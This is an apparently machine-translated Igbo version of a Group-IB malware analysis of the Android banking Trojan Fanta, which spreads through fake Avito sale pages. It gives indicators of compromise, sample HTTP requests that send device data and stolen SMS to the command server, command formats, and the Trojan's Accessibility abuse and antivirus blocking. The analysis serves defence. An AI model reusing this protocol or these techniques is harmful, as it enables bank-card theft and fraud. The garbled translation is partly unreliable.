Otu ụbọchị ịchọrọ ire ihe na Avito na, ebe ị biputere nkọwa zuru ezu nke ngwaahịa gị (dịka ọmụmaatụ, modul RAM), ị ga-enweta ozi a:
Ozugbo imepere njikọ ahụ, ị ga-ahụ ibe na-adịghị njọ na-agwa gị, onye na-ere ahịa nwere obi ụtọ na nke na-aga nke ọma, na azụrụla ya:
Ozugbo ịpịrị bọtịnụ “Gaa n'ihu”, faịlụ APK nwere akara ngosi yana aha na-akpali ntụkwasị obi ga-ebudata na ngwaọrụ gam akporo gị. Ị rụnyere ngwa nke n'ihi ihe ụfọdụ rịọrọ ikike AccessibilityService, mgbe ahụ windo ole na ole pụtara wee pụọ ngwa ngwa na ... Ọ bụ ya.
Ị na-aga ịlele nguzozi gị, mana n'ihi ihe ụfọdụ ngwa ụlọ akụ gị na-arịọ maka nkọwa kaadị gị ọzọ. Mgbe ịbanye data ahụ, ihe dị egwu na-eme: n'ihi ihe ụfọdụ ka edoghị gị anya, ego na-amalite ịpụ na akaụntụ gị. Ị na-agbalị idozi nsogbu ahụ, mana ekwentị gị na-eguzogide: ọ na-pịa igodo "Back" na "Home", anaghị agbanyụ ma ghara ikwe ka ị rụọ ọrụ nchekwa ọ bụla. N'ihi ya, a na-ahapụ gị n'enweghị ego, a zụrụghị ngwongwo gị, ị na-enwe mgbagwoju anya ma na-eche: gịnị mere?
Azịza ya dị mfe: ị bụrụla onye ihe metụtara gam akporo Trojan Fanta, onye otu ezinụlọ Flexnet. Kedu ka nke a si mee? Ka anyị kọwaara ya ugbu a.
Ndị dere: Andrey Polovinkin, ọkachamara dị obere na nyocha malware, Ivan Pisarev, ọkachamara na nyocha malware.
Ụfọdụ ọnụ ọgụgụ
Ezinụlọ Flexnet nke Android Trojans bịara mara mbụ na 2015. N'ime ogologo oge ọrụ nke ezinaụlọ ahụ gbasaara ruo ọtụtụ ụdị: Fanta, Limebot, Lipton, wdg. Trojan, yana akụrụngwa metụtara ya, anaghị eguzoro otu ebe: a na-emepụta atụmatụ nkesa ọhụrụ dị irè - n'ọnọdụ anyị, ibe phishing dị elu nke ezubere maka onye na-ere ere, na ndị mmepe Trojan na-agbaso usoro ejiji. ide nje virus - na-agbakwunye ọrụ ọhụrụ na-eme ka o kwe omume izu ohi ego nke ọma site na ngwaọrụ ndị butere ọrịa yana usoro nchebe gafere.
Mgbasa ozi a kọwara n'isiokwu a bụ maka ndị ọrụ si Russia; e dekọrọ ọnụ ọgụgụ dị nta nke ngwaọrụ ndị butere ọrịa na Ukraine, na ọbụlagodi na Kazakhstan na Belarus.
Ọ bụ ezie na Flexnet anọwo na mpaghara Android Trojan maka ihe karịrị afọ 4 ugbu a ma ọtụtụ ndị nchọpụta amụwo ya n'ụzọ zuru ezu, ọ ka dị mma. Malite na Jenụwarị 2019, ihe nwere ike imebi ihe karịrị nde 35 rubles - nke a bụ naanị maka mkpọsa na Russia. N'afọ 2015, a na-ere ụdị Trojan dị iche iche nke Android a na forums n'okpuru ala, ebe enwere ike ịchọta koodu isi iyi nke Trojan nwere nkọwa zuru ezu. Nke a pụtara na ọnụ ọgụgụ nke mmebi n'ụwa na-adọrọ mmasị karị. Ọ bụghị ihe na-egosi ihe ọjọọ nye agadi nwoke dị otú ahụ, ọ́ bụghị ya?
Site na ire ere ruo aghụghọ
Dị ka a na-ahụ site na nseta ihuenyo ewepụtara na mbụ nke ibe phishing maka ọrụ ịntanetị maka ikenye mgbasa ozi Avito, a kwadebere ya maka onye ọ metụtara. N'ụzọ doro anya, ndị na-awakpo ahụ na-eji otu n'ime ndị parsers Avito, nke na-ewepụta nọmba ekwentị na aha onye na-ere ahịa, yana nkọwa ngwaahịa. Mgbe ịgbasa ibe ahụ wee kwado faịlụ APK, onye ahụ a tara ahụhụ na-eziga SMS nwere aha ya yana njikọ na ibe phishing nwere nkọwa nke ngwaahịa ya yana ego enwetara site na “ire” ngwaahịa ahụ. Site na ịpị bọtịnụ ahụ, onye ọrụ na-enweta faịlụ APK ọjọọ - Fanta.
Nnyocha nke ngalaba shcet491[.] ru gosiri na enyefere ya na sava DNS nke Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Faịlụ mpaghara mpaghara nwere ndenye na-atụ aka na adreesị IP 31.220.23[.]236, 31.220.23[.]243, na 31.220.23[.]235. Agbanyeghị, ndekọ akụrụngwa izizi nke ngalaba (A ndekọ) na-arụtụ aka na sava nwere adreesị IP 178.132.1[.]240.
Adreesị IP 178.132.1[.]240 dị na Netherlands ma bụrụ nke onye nnabata. WorldStream. Adreesị IP 31.220.23[.]235, 31.220.23[.]236 na 31.220.23[.]243 dị na UK ma so na nkesa Bochum HOSTINGER. Ejiri ya dị ka onye na-edekọ ihe openprov-ru. Ngalaba ndị a edozikwara na adreesị IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.] ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.] ru
- perevod901[.] ru
Okwesiri iburu n'uche na njikọ dị n'ụdị a dị site na ihe fọrọ nke nta ka ọ bụrụ ngalaba niile:
http://(www.){0,1}<%domain%>/[0-9]{7}
Ihe ndebiri a tinyekwara njikọ sitere na ozi SMS. Dabere na data akụkọ ihe mere eme, a chọpụtara na otu ngalaba kwekọrọ na njikọ dị iche iche n'ụdị a kọwara n'elu, nke na-egosi na e ji otu ngalaba kesaa Trojan na ọtụtụ ndị ihe metụtara.
Ka anyị bulie n'ihu ntakịrị: Trojan ebudatara site na njikọ sitere na SMS na-eji adreesị dị ka ihe nkesa njikwa onuseseddohap[.] klọb. Edebanye aha ngalaba a na 2019-03-12, malite na 2019-04-29, ngwa APK nwere mmekọrịta na ngalaba a. Dabere na data enwetara site na VirusTotal, mkpokọta ngwa 109 nwere ihe nkesa a. Ngalaba ahụ n'onwe ya kpebiri na adreesị IP 217.23.14[.]27, nke dị na Netherlands ma nke onye nnabata ahụ nwe ya WorldStream. Ejiri ya dị ka onye na-edekọ ihe aha. Ekpebikwara ngalaba na adreesị IP a ọjọọ-racoon[.] klọb (bido site na 2018-09-25) na ọjọọ-racoon[.] dị ndụ (bido site na 2018-10-25). Na ngalaba ọjọọ-racoon[.] klọb Ejikọrọ ihe karịrị faịlụ APK 80 ọjọọ-racoon[.] dị ndụ - ihe karịrị 100.
N'ozuzu, ọgụ ahụ na-aga n'ihu dị ka ndị a:
Kedu ihe dị n'okpuru mkpuchi Fanta?
Dị ka ọtụtụ Trojans Android ndị ọzọ, Fanta nwere ike ịgụ na izipu ozi SMS, na-arịọ arịrịọ USSD, na igosipụta windo nke ya n'elu ngwa (gụnyere ụlọ akụ). Otú ọ dị, ngwa agha nke ịrụ ọrụ nke ezinụlọ a abịala: Fanta malitere iji Ọrụ nnweta maka ebumnuche dị iche iche: ịgụ ọdịnaya nke ọkwa sitere na ngwa ndị ọzọ, igbochi nchọpụta na ịkwụsị ogbugbu nke Trojan na ngwaọrụ nje, wdg. Fanta na-arụ ọrụ na ụdị gam akporo niile na-erubeghị 4.4. N'isiokwu a, anyị ga-elebakwu anya na ihe atụ Fanta ndị a:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Ozugbo ebidochara
Ozugbo ebidochara, Trojan na-ezobe akara ngosi ya. Ngwa nwere ike ịrụ ọrụ naanị ma ọ bụrụ na aha ngwaọrụ nje ahụ adịghị na listi:
- Ugbokodo
- Virtualbox
- Nexus 5X (isi ehi)
- Nexus 5 (agụba)
A na-eme nlele a na isi ọrụ nke Trojan - Ọrụ Main. Mgbe ebidochara ya na nke mbụ, a na-ebido paramita nhazi ngwa ahụ ka ọ bụrụ ụkpụrụ ndabara (usoro maka ịchekwa data nhazi na ihe ha pụtara ga-emecha), ma debanye aha ngwaọrụ ọhụrụ butere na sava njikwa. A ga-eziga arịrịọ HTTP POST nwere ụdị ozi na sava ahụ register_bot yana ozi gbasara ngwaọrụ butere ọrịa (ụdị Android, IMEI, akara ekwentị, aha onye ọrụ na koodu obodo nke edebara aha onye ọrụ na ya). Adreesị ahụ na-eje ozi dị ka ihe nkesa njikwa hXXp://onuseseddohap[.]club/controller.php. Na nzaghachi, ihe nkesa na-eziga ozi nwere mpaghara bot_id, bot_pwd, server - ngwa a na-echekwa ụkpụrụ ndị a dị ka paramita nke sava CnC. Oke server Nhọrọ ma ọ bụrụ na enwetaghị ubi ahụ: Fanta na-eji adreesị ndebanye aha - hXXp://onuseseddohap[.]club/controller.php. Enwere ike iji ọrụ nke ịgbanwe adreesị CnC dozie nsogbu abụọ: iji kesaa ibu ahụ n'otu n'otu n'etiti ọtụtụ sava (ọ bụrụ na enwere ọtụtụ ngwaọrụ ndị butere ọrịa, ibu dị na sava weebụ na-enweghị nke ọma nwere ike ịdị elu), yana iji. ihe nkesa ọzọ ma ọ bụrụ na ọdịda nke otu sava CnC dara.
Ọ bụrụ na njehie emee mgbe ị na-eziga arịrịọ, Trojan ga-emegharị usoro ndebanye aha mgbe 20 sekọnd.
Ozugbo e debanyere ngwaọrụ ahụ nke ọma, Fanta ga-egosi onye ọrụ ozi a:
Ihe dị mkpa: ọrụ a na-akpọ Nchekwa sistemụ - aha nke Trojan ọrụ, na mgbe ịpị bọtịnụ OK Window ga-eji ntọala nnweta nke ngwaọrụ nje butere, ebe onye ọrụ ga-enyerịrị ikike nnweta maka ọrụ ọjọọ ahụ:
Ozugbo onye ọrụ gbanye Ọrụ nnweta, Fanta na-enweta ohere ịnweta ọdịnaya nke windo ngwa yana omume emere na ha:
Ozugbo ọ nwetachara ikike nnweta, Trojan na-arịọ ikike na ikike onye nchịkwa ịgụ ọkwa:
N'iji ọrụ Accessibility, ngwa a na-eme ka igodo igodo, si otú ahụ na-enye onwe ya ikike niile dị mkpa.
Fanta na-emepụta ọtụtụ ọnọdụ nchekwa data (nke a ga-akọwa ma emechaa) dị mkpa iji chekwaa data nhazi, yana ozi anakọtara na usoro gbasara ngwaọrụ nje. Iji zipu ozi anakọtara, Trojan na-emepụta ọrụ ugboro ugboro iji budata mpaghara site na nchekwa data wee nweta iwu site na ihe nkesa njikwa. A na-edozi oge maka ịnweta CnC dabere na ụdị gam akporo: n'ihe banyere 5.1, etiti ahụ ga-abụ 10 sekọnd, ma ọ bụghị 60 sekọnd.
Iji nweta iwu ahụ, Fanta na-arịọ arịrịọ NwetaTask na ihe nkesa njikwa. Na nzaghachi, CnC nwere ike izipu otu n'ime iwu ndị a:
| otu | Nkowasi |
|---|---|
| 0 | Zipu ozi SMS |
| 1 | Kpọọ oku ekwentị ma ọ bụ USSD iwu |
| 2 | Na-emelite paramita nkeji |
| 3 | Na-emelite paramita nbanye |
| 6 | Na-emelite paramita sms Onye njikwa |
| 9 | Malite ịnakọta ozi SMS |
| 11 | Tọgharịa ekwentị gị na ntọala ụlọ ọrụ |
| 12 | Kwado/gbanyụọ ntinye igbe nke imepụta igbe okwu |
Fanta na-anakọta ozi sitere na ngwa ụlọ akụ 70, usoro ịkwụ ụgwọ ngwa ngwa yana e-wallet ma chekwaa ha na nchekwa data.
Ịchekwa paramita nhazi
Iji chekwaa usoro nhazi, Fanta na-eji usoro ọkọlọtọ maka ikpo okwu gam akporo - Mmasị- faịlụ. A ga-echekwa ntọala ahụ na faịlụ akpọrọ ntọala. Nkọwa nke paramita echekwara dị na tebụl dị n'okpuru.
| aha | Uru efu | Ụkpụrụ enwere ike | Nkowasi |
|---|---|---|---|
| id | 0 | Akpata | NJ Bot |
| server | hXXp://onuseseddohap[.]club/ | URL | Jikwaa adreesị nkesa |
| pwd | - | eriri | Okwuntughe sava |
| nkeji | 20 | Akpata | Ogologo oge. Na-egosi ogologo oge aga-ahapụ ọrụ ndị a:
|
| nbanye | niile | niile/tel Number | Ọ bụrụ na ubi ahụ hà eriri niile ma ọ bụ Nọmba tel, mgbe ahụ, a ga-egbochi ozi SMS enwetara site na ngwa ahụ ma ọ gaghị egosi onye ọrụ |
| sms Onye njikwa | 0 | 0/1 | Kwado/gbanyụọ ngwa dị ka onye nnata SMS ndabara |
| gụọDialog | ụgha | Eziokwu/ụgha | Kwado/gbanyụọ ndekọ mmemme Mmemme nnweta |
Fanta na-ejikwa faịlụ ahụ sms Onye njikwa:
| aha | Uru efu | Ụkpụrụ enwere ike | Nkowasi |
|---|---|---|---|
| pckg | - | eriri | Aha njikwa ozi SMS ejiri |
Mmekọrịta na ọdụ data
N'oge ọrụ ya, Trojan na-eji ọdụ data abụọ. Aha ọdụ data a eji echekwa ozi dị iche iche anakọtara na ekwentị. Akpọrọ nchekwa data nke abụọ aha fanta.db a na-ejikwa ya iji chekwaa ntọala maka ịmepụta windo phishing emebere iji nakọta ozi gbasara kaadị akụ.
Trojan na-eji nchekwa data а iji chekwaa ozi anakọtara wee debanye aha omume gị. A na-echekwa data na tebụl ndekọ. Iji mepụta tebụl, jiri ajụjụ SQL ndị a:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Ebe nchekwa data nwere ozi ndị a:
1. Jiri ozi na-abanye mmalite nke ngwaọrụ nje ahụ Ekwentị agbanwuru!
2. Amamọkwa sitere na ngwa. A na-ewepụta ozi a dịka ndebiri ndị a:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Data kaadị ụlọ akụ sitere na ụdị phishing kere nke Trojan. Oke VIEW_NAME nwere ike ịbụ otu n'ime ihe ndị a:
- AliExpress
- Avito
- Google Play
- Ụdị dị iche iche
A na-abanye ozi a n'ụdị:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Ozi SMS na-abata/ọpụpụ n'ụdị:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Ozi gbasara ngwugwu na-emepụta igbe okwu na usoro:
(<%Package name%>)<%Package information%>
Tebụl atụ ndekọ:
Otu n'ime ọrụ Fanta bụ nchịkọta ozi gbasara kaadị akụ. Nchịkọta data na-apụta site na ịmepụta windo phishing mgbe ị na-emepe ngwa ụlọ akụ. Trojan na-emepụta windo phishing naanị otu ugboro. A na-echekwa ozi nke egosiri na mpio ahụ na tebụl ntọala na nchekwa data fanta.db. Iji mepụta nchekwa data, jiri ajụjụ SQL a:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Ogige tebụl niile ntọala site na ndabara bido ya ka ọ bụrụ 1 (mepụta windo phishing). Mgbe onye ọrụ tinyechara data ha, a ga-edozi uru ahụ na 0. Ihe atụ nke ubi tebụl ntọala:
- nwere ike_nbanye - ubi ahụ bụ ọrụ maka igosipụta ụdị ahụ mgbe ị na-emepe ngwa ụlọ akụ
- mbụ_bank - ejighi ya
- nwere ike_avito - ubi ahụ bụ ọrụ maka igosipụta ụdị ahụ mgbe imepe ngwa Avito
- nwere ike_alị - ubi ahụ na-ahụ maka igosipụta ụdị ahụ mgbe imepe ngwa Aliexpress
- nwere ike_ọzọ - ubi ahụ bụ ọrụ maka igosipụta ụdị ahụ mgbe imepe ngwa ọ bụla site na listi: Yula, Pandao, Drom Auto, obere akpa. Ego na kaadị ego, Aviasales, ntinye akwụkwọ, Trivago
- can_kaadị - ubi ahụ bụ ọrụ maka igosipụta ụdị mgbe emepere ya Google Play
Mmekọrịta na ihe nkesa njikwa
Mmekọrịta netwọk na ihe nkesa njikwa na-esite na protocol HTTP. Iji soro netwọk rụọ ọrụ, Fanta na-eji ọbá akwụkwọ Retrofit ewu ewu. Arịrịọ na-ezigara na: hXXp://onuseseddohap[.]club/controller.php. Enwere ike ịgbanwe adreesị nkesa mgbe ị na-edebanye aha na ihe nkesa. Enwere ike izipu kuki na nzaghachi site na sava ahụ. Fanta na-arịọ arịrịọ ndị a na sava ahụ:
- Ndebanye aha bot na sava njikwa na-eme otu ugboro, na mbido mbụ. A na-ezigara data ndị a gbasara ngwaọrụ butere na nkesa:
· kuki - kuki enwetara site na sava (uru ndabara bụ eriri efu)
· mode - eriri mgbe niile register_bot
· nganiihu - integer mgbe niile 2
· ụdị_sdk - kpụrụ dị ka template na-esonụ: /(Avit)
· IMEI - IMEI nke ngwaọrụ nje
· mba - koodu obodo nke edebanye aha onye ọrụ, na usoro ISO
· ọnụ ọgụgụ - nọmba ekwentị
· ọrụ - aha onye ọrụỌmụmaatụ nke arịrịọ ezigara na sava ahụ:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Na nzaghachi nye arịrịọ ahụ, ihe nkesa ahụ ga-eweghachite ihe JSON nwere ihe ndị a:
· bot_id - ID nke ngwaọrụ nje. Ọ bụrụ na bot_id hà nhata 0, Fanta ga-emeghachi arịrịọ ahụ.
bot_pwd - paswọọdụ maka ihe nkesa.
ihe nkesa - adreesị ihe nkesa njikwa. Oke nhọrọ. Ọ bụrụ na akọwapụtaghị oke, adreesị echekwara na ngwa a ga-eji.Ihe atụ JSON ihe:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Rịọ ịnata iwu n'aka ihe nkesa. A na-ezigara data ndị a na sava:
· kuki - kuki enwetara site na ihe nkesa
· zụọ - id nke ngwaọrụ nje enwetara mgbe a na-eziga arịrịọ ahụ register_bot
· pwd - paswọọdụ maka ihe nkesa
· divice_admin - ubi na-ekpebi ma enwetara ikike nchịkwa. Ọ bụrụ na enwetara ikike onye nchịkwa, mpaghara ahụ hà nhata 1, ma ọ bụghị ya 0
· nchọ - Ọkwa ọrụ nnweta ohere. Ọ bụrụ na amalitere ọrụ ahụ, uru ọ bara 1, ma ọ bụghị ya 0
· Onye njikwa SMS - na-egosi ma agbanyere Trojan dị ka ngwa ndabara maka ịnata SMS
· ihuenyo - na-egosiputa ọnọdụ ihuenyo dị na ya. A ga-edozi uru ahụ 1, ma ọ bụrụ na ihuenyo dị, ma ọ bụghị 0;Ọmụmaatụ nke arịrịọ ezigara na sava ahụ:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Dabere na iwu ahụ, ihe nkesa ahụ nwere ike iweghachi ihe JSON nwere ihe dị iche iche:
· otu Zipu ozi SMS: The paramita nwere nọmba ekwentị, ederede nke SMS ozi na NJ nke ozi ezipụ. A na-eji njirimara mgbe ị na-eziga ozi na ihe nkesa nwere ụdị setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· otu Kpọọ oku ekwentị ma ọ bụ USSD iwu: Nọmba ekwentị ma ọ bụ iwu na-abịa na ahụ nzaghachi.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· otu Gbanwee oke nkeji oge.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· otu Gbanwee ihe nkwubi okwu.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· otu Gbanwee mpaghara SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· otu Anakọta ozi SMS site na ngwaọrụ nwere ọrịa.
{ "response": [ { "mode": 9 } ], "status":"ok" }· otu Tọgharịa ekwentị gị na ntọala ụlọ ọrụ:
{ "response": [ { "mode": 11 } ], "status":"ok" }· otu Gbanwee oke ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Na-eziga ozi nwere ụdị setSmsStatus. A na-arịọ arịrịọ a ka emechara iwu a Zipu ozi SMS. Arịrịọ a dị ka nke a:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Na-ebugote ọdịnaya nchekwa data. A na-ebufe otu ahịrị maka arịrịọ ọ bụla. A na-ezigara data ndị a na sava:
· kuki - kuki enwetara site na ihe nkesa
· mode - eriri mgbe niile setSaveInboxSms
· zụọ - id nke ngwaọrụ nje enwetara mgbe a na-eziga arịrịọ ahụ register_bot
· ederede - ederede na ndekọ nchekwa data dị ugbu a (ubi d site na tebụl ndekọ na nchekwa data а)
· ọnụ ọgụgụ - aha ndekọ nchekwa data dị ugbu a (ubi p site na tebụl ndekọ na nchekwa data а)
· sms_mode - ọnụ ahịa integer (ubi m site na tebụl ndekọ na nchekwa data а)Arịrịọ a dị ka nke a:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Ọ bụrụ na ezigara nke ọma na sava ahụ, a ga-ehichapụ ahịrị ahụ na tebụl. Ọmụmaatụ nke ihe JSON nke sava weghachiri:
{ "response":[], "status":"ok" }
Mmekọrịta na Ọrụ Accessibility
Emejuputa atumatu AccessibilityService iji mee ka ngwaọrụ gam akporo dị mfe iji maka ndị nwere nkwarụ. N'ọtụtụ oge, a na-achọ mmekọrịta anụ ahụ iji soro ngwa na-emekọrịta ihe. Ọrụ Accessibility na-enye gị ohere ịme ha na mmemme. Fanta na-eji ọrụ ahụ mepụta windo adịgboroja na ngwa ụlọ akụ ma gbochie ndị ọrụ imeghe ntọala sistemụ na ụfọdụ ngwa.
N'iji ọrụ nke AccessibilityService, Trojan Monitors na-agbanwe mgbanwe na ihe dị na ihuenyo nke ngwaọrụ nje. Dịka akọwara na mbụ, ntọala Fanta nwere oke ọrụ maka itinye igbe okwu na igbe okwu - gụọDialog. Ọ bụrụ na edobere oke a, a ga-agbakwunye ozi gbasara aha na nkọwa ngwugwu nke kpalitere ihe omume na nchekwa data. Trojan na-eme omume ndị a mgbe a kpalitere ihe omume:
- Ọ na-eme ka ịpị igodo azụ na ụlọ n'ọnọdụ ndị a:
· ọ bụrụ na onye ọrụ chọrọ ịmalitegharị ngwaọrụ ya
· ọ bụrụ na onye ọrụ chọrọ ihichapụ ngwa "Avito" ma ọ bụ gbanwee ikike ịnweta
· ma ọ bụrụ na e nwere aha nke ngwa "Avito" na ibe
· mgbe imepe Google Play Protect ngwa
· mgbe iji ntọala Accessibility Service na-emepe ibe
· mgbe igbe okwu Nche System pụtara
· mgbe ị na-emepe ibe ahụ na ntọala "Sere n'elu ngwa ọzọ".
· mgbe imepe ibe "ngwa", "Nweghachi na tọgharịa", "Data nrụpụta", "Tọgharia ntọala", "Developer panel", "Special. ohere", "Ohere pụrụ iche", "Ikike pụrụ iche"
· ma ọ bụrụ na emepụtara ihe omume ahụ site na ngwa ụfọdụ.Ndepụta ngwa
- android
- Master Lite
- Nna ukwu dị ọcha
- Master dị ọcha maka x86 CPU
- Njikwa ikike Ngwa Meizu
- MIUI Nchekwa
- Nna-ukwu dị ọcha - Antivirus & Cache na Cleaner
- Njikwa nne na nna na GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Weebụ Nchebe Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Nchekwa)
- Nchekwa AntiVirus Mobile PRO
- Avast antivirus & nchedo n'efu 2019
- Nchekwa ekwentị MegaFon
- Nchedo AVG maka Xperia
- Nchekwa ekwentị
- Malwarebytes antivirus & nchedo
- Antivirus maka gam akporo 2019
- Nna-ukwu nchekwa - Antivirus, VPN, AppLock, Booster
- AVG antivirus maka onye njikwa sistemụ mbadamba Huawei
- Nnweta Samsung
- Samsung Smart Manager
- Onye isi nchekwa
- Ihe nkwalite ọsọ ọsọ
- dr.web
- Oghere Nchekwa Dr.Web
- Dr.Web Mobile Control Center
- Ndụ oghere nchekwa Dr.Web
- Dr.Web Mobile Control Center
- Antivirus & Nche Nchekwa
- Nchekwa ịntanetị Kaspersky: Antivirus na Nchekwa
- Ndụ batrị Kaspersky: nchekwa na nkwalite
- Kaspersky Endpoint Security - nchekwa na njikwa
- AVG Antivirus efu 2019 - Nchekwa maka gam akporo
- Antivirus gam akporo
- Norton Mobile Nche na Antivirus
- Antivirus, firewall, VPN, nchekwa ekwentị
- Nchekwa ekwentị: antivirus, VPN, nchedo izu ohi
- Antivirus maka gam akporo
- Ọ bụrụ na arịọrọ ikike mgbe ị na-eziga ozi SMS na nọmba dị mkpirikpi, Fanta na-eme ka ọ pịa igbe ahụ Cheta nhọrọ na bọtịnụ zipu.
- Mgbe ị na-agbalị ịnapụ ikike nchịkwa na Trojan, ọ na-akpọchi ihuenyo ekwentị.
- Na-egbochi ịgbakwunye ndị nchịkwa ọhụrụ.
- Ọ bụrụ na ngwa antivirus dr.web achọpụtara ihe iyi egwu, Fanta na-eṅomi ịpị bọtịnụ eleghara anya.
- The Trojan simulates na ịpị azu na home button ma ọ bụrụ na e mere omume site ngwa Nlekọta ngwaọrụ Samsung.
- Fanta na-emepụta windo phishing nwere ụdị maka itinye ozi gbasara kaadị ụlọ akụ ma ọ bụrụ na ewepụtara ngwa sitere na ndepụta ihe dị ka ọrụ ịntanetị 30 dị iche iche. N'ime ha: AliExpress, ntinye akwụkwọ, Avito, Google Play Market Component, Pandao, Drom Auto, wdg.
Ụdị phishing
Fanta na-enyocha ngwa ndị na-arụ na ngwaọrụ nje butere. Ọ bụrụ na emepere ngwa nke mmasị, Trojan na-egosiputa windo phishing n'elu ndị ọzọ niile, nke bụ ụdị maka itinye ozi kaadị akụ. Onye ọrụ ga-etinyerịrị data ndị a:
- Nọmba kaadị
- Ụbọchị ngwụcha kaadị
- CVV
- Aha onye nwe kaadị (ọ bụghị maka ụlọ akụ niile)
Dabere na ngwa na-agba ọsọ, a ga-egosi windo phishing dị iche iche. N'okpuru bụ ọmụmaatụ ụfọdụ n'ime ha:
AliExpress:
Avito:
Maka ụfọdụ ngwa ndị ọzọ, dịka. Ahịa Google Play, Aviasales, Pandao, ntinye akwụkwọ, Trivago:
Otú ọ dị n'ezie
Ọ dabara nke ọma, onye natara ozi SMS nke akọwara na mmalite nke isiokwu ahụ mechara bụrụ ọkachamara n'ihe gbasara cybersecurity. Ya mere, n'ezie, nsụgharị nke na-abụghị onye nduzi dị iche na nke a gwara na mbụ: mmadụ natara SMS na-adọrọ mmasị, mgbe nke ahụ gasịrị, o nyere ya Group-IB Threat Hunting Intelligence otu. Nsonaazụ nke mwakpo ahụ bụ akụkọ a. Obi ụtọ ọgwụgwụ, nri? Otú ọ dị, ọ bụghị akụkọ niile na-ejedebe nke ọma, na ka nke gị ghara ịdị ka onye nduzi na-egbutu ego, n'ọtụtụ ọnọdụ, ọ ga-ezuru ịgbaso iwu ndị a kọwara ogologo oge:
- etinyela ngwa maka ekwentị mkpanaaka nwere gam akporo OS site na isi mmalite ọ bụla na-abụghị Google Play
- Mgbe ị na-etinye ngwa, tinye uche pụrụ iche na ikike nke ngwa ahụ rịọrọ
- ṅaa ntị na ndọtị nke faịlụ ebudatara
- wụnye Android OS mmelite mgbe niile
- eletala akụrụngwa enyo enyo ma budata faịlụ n'ebe ahụ
- Apịla njikọ enwetara na ozi SMS.
isi: www.habr.com